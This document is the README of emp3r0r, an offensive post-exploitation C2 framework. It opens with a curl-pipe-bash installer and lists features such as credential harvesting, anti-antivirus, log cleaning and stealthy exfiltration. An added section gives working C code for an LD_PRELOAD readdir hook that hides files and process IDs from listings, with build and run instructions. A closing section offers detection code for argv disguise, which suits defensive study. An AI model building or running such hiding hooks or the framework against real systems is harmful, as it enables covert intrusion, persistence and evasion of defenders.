A post-exploitation framework for Linux/Windows
Demo video: emp3r0r-reverse-proxy-demo.mp4
More Screenshots and videos
How to use
```bash
curl -sSL https://raw.githubusercontent.com/jm33-m0/emp3r0r/refs/heads/master/install.sh | bash
```

As with any `curl | bash` installer, fetch the script first and read it before piping it into a shell, especially on a machine you care about.
Read the wiki to get started. Please also consider contributing your own documentation there to help others.
Motivation
Initially, emp3r0r was developed as one of my weaponizing experiments. It was a learning process for me, trying to implement common Linux adversary techniques and some of my original ideas.

So, what makes emp3r0r different? First of all, it is the first C2 framework that targets the Linux platform, and it lets you run any other tools through it. Take a look at the features for more valid reasons to use it.
To support third-party modules, emp3r0r has complete python3 support, included in the `vaccine` module (15MB in total), with necessary third-party packages such as Impacket, Requests and MySQL.
Features
- Beautiful Terminal UI
- Stealth
  - Automatically changes `argv` so you won't notice it in a `ps` listing
  - Hide files and PIDs via Glibc hijacking (`patcher` in `get_persistence`)
  - Built-in Elvish Shell with the same disguise as the main process
  - Bring Your Own Shell or any interactive programs via custom modules such as bettercap
- All C2 communications made in HTTP2/TLS
  - Defeat JA3 fingerprinting with UTLS
  - Painlessly encapsulated in Shadowsocks and KCP
  - Able to encapsulate in any external proxies such as TOR and CDNs
  - C2 relaying via SSH
- Cross-platform memory dumping
- Staged Payload Delivery for both Linux and Windows
  - HTTP Listener with AES and compression
  - DLL agent and Shellcode agent for Windows targets, and Shared Library stager with compression and encryption for Linux
- Automatically bridge agents from internal networks to C2 using a Shadowsocks proxy chain
  - For semi-isolated networks, where agents can negotiate and form a proxy chain
- Any reachable targets can be (reverse) proxied out via SSH and a stealth KCP tunnel
  - Bring any targets you can reach to C2
  - Useful when targets can't establish outgoing connections but can accept incoming requests
- Multi-Tasking
  - Don't have to wait for any commands to finish
- Module Support
  - Provides a python3 environment that can easily run your exploits/tools on any Linux host
  - Custom Modules
    - Supports various module formats: `exe`, `elf`, `python`, `powershell`, `bash`, `dll`, and `so`
    - Ability to run a module as an interactive shell, e.g. `bettercap`, `elvish`
    - In-memory execution for modules: `bash`, `powershell`, `python`, and even ELF executables (CGO ELF loader)
- Perfect Shell Experience via SSH with PTY support
  - Compatible with any SSH client and available for Windows
- Bettercap
- Auto persistence via various methods
- Post-exploitation Tools
  - Nmap, Socat, Ncat, Bettercap, etc
- Credential Harvesting
- Process Injection
- Shellcode Injection
- ELF Patcher for persistence
  - Hide processes and files and get persistence via shared library injection
- Networking
  - Port Mapping
    - From C2 side to agent side, and vice versa
    - TCP/UDP both supported
  - Agent Side Socks5 Proxy with UDP support
- Auto Root
- LPE Suggest
- System Info Collect
- File Management
  - Resumable downloads/uploads with integrity verification
  - Recursive downloads with regex filter support
  - Transparent `zstd` compression for data exfiltration
  - SFTP support: browse remote files with any SFTP client, including your local GUI file manager
- Log Cleaner
- Screenshot
- Anti-Antivirus
- Internet Access Checker
- and many more :)
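The two stealth items above, "Hide files and PIDs via Glibc hijacking" and "Hide processes and files ... via shared library injection", both rest on the same mechanism: a shared library that exports its own `readdir`, gets loaded ahead of glibc (LD_PRELOAD, `/etc/ld.so.preload` or injection), and filters what directory listings return. Tools like `ls`, `ps` and `top` build their output from `readdir` over a directory or over `/proc`, so entries the hook drops never reach them. The following is an added illustration of that technique, written for this page; it is not emp3r0r's `patcher` code. The `emp3r0r_` name prefix and the single-PID filter are assumptions for the demo, and the helper functions exist only so the effect can be checked in-process (calls to `readdir` in this file bind to the interposed one even without LD_PRELOAD).

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* RTLD_NEXT, dirfd, mkdtemp */
#endif
#include <dirent.h>
#include <dlfcn.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)   /* glibc's value, in case feature macros came too late */
#endif

/* Assumed marker for this demo: entries whose name starts with it are hidden.
 * The marker emp3r0r's own patcher uses is not stated on the page. */
#define HIDE_PREFIX "emp3r0r_"

static pid_t hidden_pid = 0;                 /* PID to drop from /proc listings; 0 = none */
void set_hidden_pid(pid_t pid) { hidden_pid = pid; }

typedef struct dirent *(*readdir_fn)(DIR *);

/* Is this DIR* a handle on /proc itself? Resolve its fd through /proc/self/fd. */
static int is_proc_root(DIR *dirp) {
    char link[64], target[PATH_MAX];
    snprintf(link, sizeof link, "/proc/self/fd/%d", dirfd(dirp));
    ssize_t n = readlink(link, target, sizeof target - 1);
    if (n < 0) return 0;
    target[n] = '\0';
    return strcmp(target, "/proc") == 0;
}

static int should_hide(DIR *dirp, const char *name) {
    if (strncmp(name, HIDE_PREFIX, sizeof(HIDE_PREFIX) - 1) == 0) return 1;
    if (hidden_pid > 0 && is_proc_root(dirp)) {   /* ps/top enumerate /proc this way */
        char pidstr[32];
        snprintf(pidstr, sizeof pidstr, "%d", (int)hidden_pid);
        return strcmp(name, pidstr) == 0;
    }
    return 0;
}

/* Interposed readdir: same symbol as glibc's, so every caller in the process gets
 * this one. It pulls entries from the real readdir and skips the hidden ones. */
struct dirent *readdir(DIR *dirp) {
    static readdir_fn real_readdir = NULL;
    if (real_readdir == NULL) {
        real_readdir = (readdir_fn)dlsym(RTLD_NEXT, "readdir");
        if (real_readdir == NULL) return NULL;
    }
    struct dirent *ent;
    while ((ent = real_readdir(dirp)) != NULL)
        if (!should_hide(dirp, ent->d_name)) break;
    return ent;
}

/* Does a listing of `dir` (through the hooked readdir) contain `name`? -1 if unopenable. */
int listing_contains(const char *dir, const char *name) {
    DIR *d = opendir(dir);
    if (d == NULL) return -1;
    int found = 0;
    struct dirent *ent;
    while ((ent = readdir(d)) != NULL)
        if (strcmp(ent->d_name, name) == 0) { found = 1; break; }
    closedir(d);
    return found;
}

/* Demo: a prefixed file vanishes from its directory listing, a plain one stays. */
int demo_hide_file(void) {
    char dir[] = "/tmp/hidedemo.XXXXXX", visible[PATH_MAX], hidden[PATH_MAX];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(visible, sizeof visible, "%s/notes.txt", dir);
    snprintf(hidden, sizeof hidden, "%s/%simplant", dir, HIDE_PREFIX);
    FILE *f1 = fopen(visible, "w"), *f2 = fopen(hidden, "w");
    if (f1) fclose(f1);
    if (f2) fclose(f2);
    int ok = listing_contains(dir, "notes.txt") == 1 &&
             listing_contains(dir, HIDE_PREFIX "implant") == 0;
    unlink(visible); unlink(hidden); rmdir(dir);
    return ok;
}

/* Demo: our own PID disappears from /proc while hidden and reappears afterwards. */
int demo_hide_pid(void) {
    char pidstr[32];
    snprintf(pidstr, sizeof pidstr, "%d", (int)getpid());
    set_hidden_pid(getpid());
    int gone = listing_contains("/proc", pidstr) == 0;
    set_hidden_pid(0);
    int back = listing_contains("/proc", pidstr) == 1;
    return gone && back;
}

int main(void) {
    printf("file hidden: %s\npid hidden:  %s\n",
           demo_hide_file() ? "yes" : "no", demo_hide_pid() ? "yes" : "no");
    return 0;
}
```

Build it as a shared object (`gcc -shared -fPIC -o hook.so hook.c -ldl`, omitting `-ldl` on glibc 2.34+) and run `LD_PRELOAD=./hook.so ls /tmp` to see the effect from outside. A production hook also covers `readdir64`, `opendir`/`fdopendir` of the hidden paths and the `stat` family, otherwise a directly named path still resolves; conversely, that gap is the defender's check: compare a `readdir`-based listing with a statically linked tool or with `getdents64` called directly, and treat entries that exist on disk but are missing from the listing as evidence of a preload hook.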
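The argv disguise in the Stealth section ("Automatically changes `argv` so you won't notice it in a `ps` listing", and the same disguise on the built-in Elvish shell) only rewrites what `/proc/<pid>/cmdline` shows. The kernel keeps two other names for the process that the agent does not get for free: `/proc/<pid>/comm` (set at `execve` from the basename of the executed path, truncated to 15 bytes, and changeable only through `prctl(PR_SET_NAME)`) and `/proc/<pid>/exe` (a symlink to the binary actually mapped, which also gains a ` (deleted)` suffix if the file was unlinked after exec). A practitioner hunting for such a disguise cross-checks the three. The following is an added check written for this page, not code from emp3r0r; the flag names and the `names_consistent` helper are this example's own.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define MISMATCH_COMM  1   /* comm does not match the exe basename */
#define MISMATCH_ARGV0 2   /* argv[0] basename does not match the exe basename */
#define COMM_LEN 15        /* kernel TASK_COMM_LEN - 1 */

/* basename without allocating; also strips the " (deleted)" suffix that
 * /proc/<pid>/exe carries for a binary unlinked after exec. */
static void base_name(const char *path, char *out, size_t n) {
    const char *slash = strrchr(path, '/');
    const char *start = slash ? slash + 1 : path;
    size_t len = strlen(start);
    const char *del = strstr(start, " (deleted)");
    if (del) len = (size_t)(del - start);
    if (len >= n) len = n - 1;
    memcpy(out, start, len);
    out[len] = '\0';
}

/* Pure comparison over the three names; returns a bitmask of MISMATCH_* flags.
 * Kept separate from the /proc reading so it can be exercised on fixed inputs. */
int names_consistent(const char *comm, const char *exe_path, const char *argv0) {
    char exe[NAME_MAX + 1], arg[NAME_MAX + 1], expected[COMM_LEN + 1];
    base_name(exe_path, exe, sizeof exe);
    base_name(argv0, arg, sizeof arg);
    snprintf(expected, sizeof expected, "%.*s", COMM_LEN, exe);  /* what exec would set */
    int flags = 0;
    if (strcmp(comm, expected) != 0) flags |= MISMATCH_COMM;
    if (strcmp(arg, exe) != 0) flags |= MISMATCH_ARGV0;
    return flags;
}

/* Read a /proc text file and cut it at the first newline or NUL: that yields
 * the bare name from comm and argv[0] from the NUL-separated cmdline. */
static int read_first_field(const char *path, char *out, size_t n) {
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t got = fread(out, 1, n - 1, f);
    fclose(f);
    out[got] = '\0';
    out[strcspn(out, "\n")] = '\0';
    return 0;
}

/* Cross-check comm, exe and argv[0] of `pid`; mismatch mask, or -1 if unreadable. */
int check_disguise(pid_t pid) {
    char path[64], comm[64], exe[PATH_MAX], argv0[PATH_MAX];
    snprintf(path, sizeof path, "/proc/%d/comm", (int)pid);
    if (read_first_field(path, comm, sizeof comm) < 0) return -1;
    snprintf(path, sizeof path, "/proc/%d/exe", (int)pid);
    ssize_t n = readlink(path, exe, sizeof exe - 1);
    if (n < 0) return -1;                     /* kernel thread, or not our process to inspect */
    exe[n] = '\0';
    snprintf(path, sizeof path, "/proc/%d/cmdline", (int)pid);
    if (read_first_field(path, argv0, sizeof argv0) < 0) return -1;
    return names_consistent(comm, exe, argv0);
}

int main(void) {
    int r = check_disguise(getpid());
    printf("self: %s\n", r == 0 ? "consistent" : r < 0 ? "unreadable" : "names disagree");
    return 0;
}
```

Run `check_disguise` over every numeric entry in `/proc` to sweep a host. A non-zero result is a lead, not a verdict: interpreters reached through a symlink (`/usr/bin/python3` resolving to `python3.12`), daemons that legitimately rewrite `argv` (PostgreSQL workers, `sshd` session processes) and anything renamed with `PR_SET_NAME` will all trip it, so pair the mismatch with the `exe` path and its hash before acting. An agent that also sets `comm` and runs from an unlinked file defeats the first two comparisons but then shows the ` (deleted)` suffix, which this check strips before comparing and which is worth flagging on its own.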